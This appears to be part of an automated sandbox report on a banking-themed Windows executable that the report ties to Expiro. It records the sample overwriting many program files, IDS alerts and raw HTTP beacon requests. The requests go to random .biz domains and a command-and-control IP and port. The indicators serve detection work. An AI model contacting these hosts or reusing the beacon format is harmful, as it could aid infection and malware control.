Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\SensorDataService.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msdtc.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046445A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,	0_2_0046C6D1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0046C75C
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046EF95
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046F0F2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046F3F3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004637EF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00463B12
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046BCBC

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:54634 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49724 -> 72.52.178.23:80
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49755 -> 13.213.51.196:80
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:55274 -> 1.1.1.1:53

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 204.10.161.147
Source: Malware configuration extractor	URLs: 204.10.161.147:7082

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 204.10.161.147 ports 7082,7081,0,2,7,8

Queries random domain names (often used to prevent blacklisting and sinkholes)

Source: unknown

DNS traffic detected: English language letter frequency does not match the domain names

Source: unknown

Network traffic detected: DNS query count 49

Source: global traffic

TCP traffic: 192.168.2.4:49723 -> 204.10.161.147:7082

Source: Joe Sandbox View

IP Address: 13.248.148.254 13.248.148.254

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.11.240.239:80 -> 192.168.2.4:49717
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.11.240.239:80 -> 192.168.2.4:49717
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.245.175.187:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.245.175.187:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.43.119.120:80 -> 192.168.2.4:49767
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.43.119.120:80 -> 192.168.2.4:49767
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.169.144.97:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.169.144.97:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.26.80.133:80 -> 192.168.2.4:49787
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.26.80.133:80 -> 192.168.2.4:49787
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.229.166.50:80 -> 192.168.2.4:49776
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.229.166.50:80 -> 192.168.2.4:49776
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.85.87.184:80 -> 192.168.2.4:49768
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.85.87.184:80 -> 192.168.2.4:49768
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.229.117.57:80 -> 192.168.2.4:49722
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.229.117.57:80 -> 192.168.2.4:49722
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.212.150.54:80 -> 192.168.2.4:49795
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.212.150.54:80 -> 192.168.2.4:49795
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.142.91.111:80 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.142.91.111:80 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.213.51.196:80 -> 192.168.2.4:49779
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.213.51.196:80 -> 192.168.2.4:49779

Source: global traffic	HTTP traffic detected: POST /oqcvpoewhl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bwejhhjeahxfje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic	HTTP traffic detected: POST /bspqodujb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /arkfkq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /buysxojjpcbe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /uhxgrttve HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET /uhxgrttve?usid=25&utid=9755593280 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /twetxppkkq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xltkhwus HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic	HTTP traffic detected: POST /srydcadgxm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ldqqpocfqndx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kobojotdnctbldt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /llpwgsaooq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yhgrkvedbhvggxwh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET /yhgrkvedbhvggxwh?usid=25&utid=9755608042 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /okybrjufbtsub HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET /okybrjufbtsub?usid=25&utid=9755608117 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /om HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pucgkwypphrledk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ttplobtxqmiksba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rmikhaggcn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /udiyekihhlktyw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
